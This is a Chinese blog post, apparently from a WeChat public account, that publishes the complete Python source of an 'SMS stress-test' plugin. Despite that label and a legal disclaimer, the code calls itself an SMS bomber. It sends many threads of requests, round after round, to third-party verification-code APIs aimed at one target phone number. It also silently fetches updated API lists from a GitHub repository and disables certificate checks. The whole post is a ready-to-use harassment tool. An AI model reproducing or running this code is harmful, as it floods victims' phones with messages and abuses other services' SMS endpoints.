短信测压V1.2版本插件源码

🚀 脚本名称:短信测压V1.2版本
💻 语言:Python 3.1+
————————————
📝 功能介绍
————————————
短信测压,懂的都懂
本源码已经无多少bug,可以完美运行,但测压效果根据地区的不同,可能无法达到想要的预期,这个请自行查找修改
————————————

————————————
⚠️ 免责声明
————————————
1.本公众号分享的源码及程序仅供学习交流与技术研究之用,严禁用于任何商业或非法用途。
2.本脚本按“现状”提供,不提供任何形式的明示或暗示担保。运行环境差异可能导致意外结果,请在测试环境中先行验证。
3.若使用者因参考或运行本文代码造成数据丢失、系统故障或其他损失,本人及本公众号不承担任何法律责任。
4.如涉及第三方API或网站,请遵守其对应平台的 robots.txt协议及相关服务条款。
合规使用:本代码仅为技术演示。请勿高频请求目标服务器,避免对其造成负担,否则可能面临IP封禁甚至法律风险。
账号安全:请勿将包含个人Token、Cookie或密码的代码直接上传至公开仓库,由此导致的账号被盗责任自负。
禁止滥用:严禁利用本脚本进行网络攻击、数据窃取或任何违反《网络安全法》的行为。
风险自担:一旦运行本程序,即视为您已了解并同意自行承担所有风险。作者不对任何直接或间接损害负责。
————————————
📸 效果预览
————————————

————————————
📄 核心源码
————————————
# encoding=utf8import jsonimport loggingimport osimport pathlibimport sysimport timeimport httpximport threadingimport asyncioimport copyfrom concurrent.futures import ThreadPoolExecutor, as_completedfrom typing import List, Tuple, Dict, Any, Union, Optionalfrom httpx import Limits# 抑制httpx的INFO级日志httpx_logger = logging.getLogger("httpx")httpx_logger.setLevel(logging.WARNING)# 日志配置 - 设置为WARNING级别以减少输出logging.basicConfig(level=logging.WARNING, # 改为WARNING级别format='%(asctime)s - %(levelname)s - %(message)s',handlers=[logging.StreamHandler()])logger = logging.getLogger('SMS_Bomber')# 应用路径 - 修复 __file__ 未定义问题if getattr(sys, 'frozen', False):# 打包后的可执行文件路径APP_PATH = os.path.dirname(sys.executable)else:# 脚本运行时的路径try:APP_PATH = os.path.dirname(os.path.abspath(__file__))except NameError:# 交互式环境或其他特殊情况APP_PATH = os.path.dirname(os.path.abspath(sys.argv[0]))# 默认配置DEFAULT_CONFIG = {"thread": 64, # 线程数"frequency": 60, # 轮次(总执行次数)"interval": 60 # 轮次间隔(秒)}# 全局状态管理class BombingState:def __init__(self):self.active = Falseself.paused = Falseself.stopped = Falseself.phone = ""self.frequency = DEFAULT_CONFIG["frequency"]self.interval = DEFAULT_CONFIG["interval"]self.lock = threading.Lock()self.total_count = 0 # 总请求次数self.success_count = 0 # 成功次数self.fail_count = 0 # 失败次数self.round = 0state = BombingState()# API类定义(不使用Pydantic)class API:"""处理自定义 API 数据"""def __init__(self, desc: str = "Default", url: str = "", method: str = "GET",header: Optional[Union[str, dict]] = None, data: Optional[Union[str, dict]] = None):self.desc = descself.url = urlself.method = methodself.header = headerself.data = datadef replace_data(self, content: Union[str, dict], phone: str) -> Union[str, dict]:"""替换内容中的占位符"""if not phone:return content# 统一转换成 str 再替换if isinstance(content, dict):# 如果是字典,递归处理每个值return {k: self.replace_data(v, phone) for k, v in content.items()}elif isinstance(content, str):# 替换占位符content = content.replace("[phone]", phone)content = content.replace("[timestamp]", self.timestamp_new())return contentreturn contentdef timestamp_new(self) -> str:"""返回整数字符串时间戳"""from datetime import datetimereturn str(int(datetime.now().timestamp()))def handle_API(self, phone: str = None) -> 'API':"""传入手机号处理 API"""# 创建副本避免修改原始对象api_copy = copy.deepcopy(self)# 处理headerif api_copy.header is None:api_copy.header = default_header_user_agent()else:api_copy.header = self.replace_data(api_copy.header, phone)# 确保header是字典if isinstance(api_copy.header, str):try:api_copy.header = json.loads(api_copy.header)except:api_copy.header = {"User-Agent": api_copy.header}# 确保有Refererif isinstance(api_copy.header, dict) and not any(k.lower() == 'referer' for k in api_copy.header):api_copy.header['Referer'] = api_copy.url# 处理dataif api_copy.data is not None:api_copy.data = self.replace_data(api_copy.data, phone)# 尝试解析JSONif isinstance(api_copy.data, str):try:api_copy.data = json.loads(api_copy.data)except:pass# 处理URLapi_copy.url = self.replace_data(api_copy.url, phone)return api_copy# 默认请求头def default_header_user_agent() -> Dict[str, str]:return {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36","Accept": "*/*","Connection": "keep-alive"}# 加载API配置def load_apis() -> Tuple[List[API], List[API]]:try:json_path = pathlib.Path(APP_PATH, 'api.json')if not json_path.exists():raise FileNotFoundError("api.json not found")with open(json_path, "r", encoding="utf8") as f:apis_data = json.loads(f.read())apis = []for data in apis_data:# 处理可能的额外字段desc = data.get("desc", "Default")url = data.get("url", "")method = data.get("method", "GET")header = data.get("header", None)data_field = data.get("data", None)apis.append(API(desc=desc, url=url, method=method, header=header, data=data_field))print(f"api.json 加载完成 接口数:{len(apis)}")getapi_path = pathlib.Path(APP_PATH, 'GETAPI.json')if not getapi_path.exists():raise FileNotFoundError("GETAPI.json not found")with open(getapi_path, "r", encoding="utf8") as f:get_apis_data = json.loads(f.read())# 将字符串URL转换为API对象get_apis = []for item in get_apis_data:if isinstance(item, str):get_apis.append(API(url=item, method="GET"))elif isinstance(item, dict):desc = item.get("desc", "Default")url = item.get("url", "")method = item.get("method", "GET")header = item.get("header", None)data_field = item.get("data", None)get_apis.append(API(desc=desc, url=url, method=method, header=header, data=data_field))print(f"GETAPI.json 加载完成 接口数:{len(get_apis)}")return apis, get_apisexcept Exception as e:# 静默处理错误,不输出日志print("正在尝试更新API配置...")update_apis()return load_apis()# 从GitHub更新API配置def update_apis():base_url = "https://raw.githubusercontent.com/iqcwl/iqcwl/master"files = {"GETAPI.json": f"{base_url}/GETAPI.json","api.json": f"{base_url}/api.json"}try:with httpx.Client(verify=False, timeout=10) as client:for filename, url in files.items():response = client.get(url, headers=default_header_user_agent())response.raise_for_status()with open(pathlib.Path(APP_PATH, filename), "w", encoding="utf8") as f:f.write(response.text)print("API配置更新成功!")except Exception:# 静默处理错误,不输出日志pass# 验证手机号格式def validate_phone(phone: str) -> bool:return phone.isdigit() and len(phone) == 11# 请求的方法def reqAPI(api: API, client: httpx.Client) -> httpx.Response:"""发送API请求"""# 处理APIprocessed_api = api.handle_API(state.phone if state.active else "")headers = processed_api.header if isinstance(processed_api.header, dict) else default_header_user_agent()if isinstance(processed_api.data, dict):resp = client.request(method=processed_api.method.upper(),json=processed_api.data,headers=headers,url=processed_api.url,timeout=10)else:data = processed_api.data if processed_api.data else Noneresp = client.request(method=processed_api.method.upper(),data=data,headers=headers,url=processed_api.url,timeout=10)return resp# 请求接口方法 - 移除所有错误日志def reqFunc(api: Union[API, str], phone: str) -> bool:"""请求接口方法"""try:with httpx.Client(headers=default_header_user_agent(), verify=False, timeout=10) as client:if isinstance(api, API):# 处理APIprocessed_api = api.handle_API(phone)resp = reqAPI(processed_api, client)return 200 <= resp.status_code < 400else:# 处理字符串URLurl = api.replace("{phone}", phone).replace("[phone]", phone)url = url.replace(" ", "").replace('\n', '').replace('\r', '')resp = client.get(url=url, headers=default_header_user_agent(), timeout=10)return 200 <= resp.status_code < 400except:# 静默处理所有异常,不输出日志return False# 异步请求方法 - 移除所有错误日志async def asyncReqs(src: Union[API, str], phone: str, semaphore: asyncio.Semaphore) -> Optional[httpx.Response]:"""异步请求方法"""async with semaphore:try:async with httpx.AsyncClient(limits=Limits(max_connections=1000, max_keepalive_connections=2000),headers=default_header_user_agent(),verify=False,timeout=10) as client:if isinstance(src, API):# 处理APIprocessed_api = src.handle_API(phone)if isinstance(processed_api.data, dict):r = await client.request(method=processed_api.method.upper(),json=processed_api.data,headers=processed_api.header if isinstance(processed_api.header, dict) else default_header_user_agent(),url=processed_api.url)else:data = processed_api.data if processed_api.data else Noner = await client.request(method=processed_api.method.upper(),data=data,headers=processed_api.header if isinstance(processed_api.header, dict) else default_header_user_agent(),url=processed_api.url)else:# 处理字符串URLurl = src.replace("{phone}", phone).replace("[phone]", phone)url = url.replace(" ", "").replace('\n', '').replace('\r', '')r = await client.get(url=url, headers=default_header_user_agent())return rexcept:# 静默处理所有异常,不输出日志return None# 发送请求 - 移除错误日志def send_request(api: Union[API, Dict, str], phone: str) -> Tuple[bool, int]:"""发送请求并返回结果"""try:# 处理不同类型的API输入if isinstance(api, dict):# 如果是字典,转换为API对象api_obj = API(desc=api.get("desc", "Default"),url=api.get("url", ""),method=api.get("method", "GET"),header=api.get("header", None),data=api.get("data", None))success = reqFunc(api_obj, phone)return success, 200 if success else 0elif isinstance(api, str):# 如果是字符串,直接使用success = reqFunc(api, phone)return success, 200 if success else 0else:# 否则是API对象success = reqFunc(api, phone)return success, 200 if success else 0except:# 静默处理所有异常,不输出日志return False, 0# 执行单轮轰炸def run_bombing_round(apis: List[Union[API, Dict, str]], phone: str, round_num: int, total_rounds: int) -> Tuple[int, int]:"""执行单轮轰炸"""total_apis = len(apis)print(f"===== 第 {round_num}/{total_rounds} 轮轰炸开始 =====")print(f"本轮计划发送 {total_apis} 次请求")success_count = 0fail_count = 0with ThreadPoolExecutor(max_workers=min(DEFAULT_CONFIG["thread"], total_apis)) as executor:futures = [executor.submit(send_request, api, phone) for api in apis]for future in as_completed(futures):# 检查暂停/停止状态with state.lock:if state.stopped:breakif state.paused:print("轰炸已暂停,等待恢复...")while state.paused and not state.stopped:time.sleep(0.5)if state.stopped:breaktry:success, status_code = future.result()with state.lock:state.total_count += 1if success:success_count += 1state.success_count += 1else:fail_count += 1state.fail_count += 1# 每10次请求打印一次实时累计if state.total_count % 10 == 0:print(f"实时累计发送: 总计 {state.total_count} 次请求, "f"成功 {state.success_count} 次, 失败 {state.fail_count} 次")except:with state.lock:state.total_count += 1state.fail_count += 1fail_count += 1# 每10次请求打印一次实时累计if state.total_count % 10 == 0:print(f"实时累计发送: 总计 {state.total_count} 次请求, "f"成功 {state.success_count} 次, 失败 {state.fail_count} 次")print(f"===== 第 {round_num} 轮轰炸完成 =====")print(f"本轮结果: 成功 {success_count} 次, 失败 {fail_count} 次")print(f"累计总发送: 成功 {state.success_count} 次, 失败 {state.fail_count} 次, 总计 {state.total_count} 次")return success_count, fail_count# 轰炸任务主函数def bombing_task(phone: str, frequency: int, interval: int):"""轰炸任务主函数"""global statewith state.lock:state.active = Truestate.paused = Falsestate.stopped = Falsestate.phone = phonestate.frequency = frequencystate.interval = intervalstate.total_count = 0state.success_count = 0state.fail_count = 0state.round = 0print(f"轰炸任务启动! 目标: {phone}, 轮数: {frequency}, 间隔: {interval}秒")try:apis, get_apis = load_apis()all_apis = apis + get_apistotal_apis = len(all_apis)print(f"总共加载 {total_apis} 个API接口")for round_num in range(1, frequency + 1):with state.lock:if state.stopped:print("轰炸任务已被用户终止")breakstate.round = round_numrun_bombing_round(all_apis, phone, round_num, frequency)if round_num < frequency:with state.lock:if state.stopped:breakif not state.paused:print(f"等待 {interval} 秒后开始下一轮...")# 分段等待以便及时响应停止/暂停for _ in range(interval):if state.stopped or state.paused:breaktime.sleep(1)except:# 静默处理所有异常,不输出日志passfinally:with state.lock:state.active = Falsestate.paused = Falseprint(f"轰炸任务结束! 总计发送: 成功 {state.success_count} 次, 失败 {state.fail_count} 次, 总计 {state.total_count} 次")# 启动轰炸def start_bombing(phone: str, frequency: int = None, interval: int = None):"""启动轰炸任务"""with state.lock:if state.active:print("已有轰炸任务正在运行")returnif not validate_phone(phone):print("手机号格式错误,请输入11位数字")returnfreq = frequency if frequency is not None else DEFAULT_CONFIG["frequency"]inter = interval if interval is not None else DEFAULT_CONFIG["interval"]# 在新线程中运行轰炸任务threading.Thread(target=bombing_task, args=(phone, freq, inter), daemon=True).start()# 暂停轰炸def pause_bombing():"""暂停轰炸任务"""with state.lock:if not state.active:print("没有正在运行的轰炸任务")returnif state.paused:print("轰炸已经处于暂停状态")returnstate.paused = Trueprint("轰炸已暂停")# 恢复轰炸def resume_bombing():"""恢复轰炸任务"""with state.lock:if not state.active:print("没有正在运行的轰炸任务")returnif not state.paused:print("轰炸未处于暂停状态")returnstate.paused = Falseprint("轰炸已恢复")# 停止轰炸def stop_bombing():"""停止轰炸任务"""with state.lock:if not state.active:print("没有正在运行的轰炸任务")returnstate.stopped = Truestate.paused = Falseprint("轰炸已停止")# 查看状态def status_bombing():"""查看轰炸状态"""with state.lock:if not state.active:print("当前没有轰炸任务运行")returnstatus = "运行中" if not state.paused else "已暂停"print(f"轰炸状态: {status}")print(f"目标手机号: {state.phone}")print(f"当前轮次: {state.round}/{state.frequency}")print(f"累计发送: 总计 {state.total_count} 次请求")print(f" 成功: {state.success_count} 次")print(f" 失败: {state.fail_count} 次")print(f"轮次间隔: {state.interval} 秒")# 命令处理函数def dxhz_main(terminal, *args):"""命令处理函数"""if len(args) == 0:print("可用命令:")print(" dxhz start <手机号> [次数] [间隔] - 启动轰炸")print(" dxhz pause - 暂停轰炸")print(" dxhz resume - 恢复轰炸")print(" dxhz stop - 停止轰炸")print(" dxhz status - 查看状态")returncmd = args[0].lower()if cmd == "start":if len(args) < 2:print("缺少手机号参数")returnphone = args[1]try:frequency = int(args[2]) if len(args) > 2 else Noneinterval = int(args[3]) if len(args) > 3 else Noneexcept ValueError:print("次数和间隔必须是整数")returnstart_bombing(phone, frequency, interval)elif cmd == "pause":pause_bombing()elif cmd == "resume":resume_bombing()elif cmd == "stop":stop_bombing()elif cmd == "status":status_bombing()else:print(f"未知命令: {cmd}")def register_commands():"""注册命令"""return {"dxhz": dxhz_main,}

本源码已开源,可随意修改使用
夜雨聆风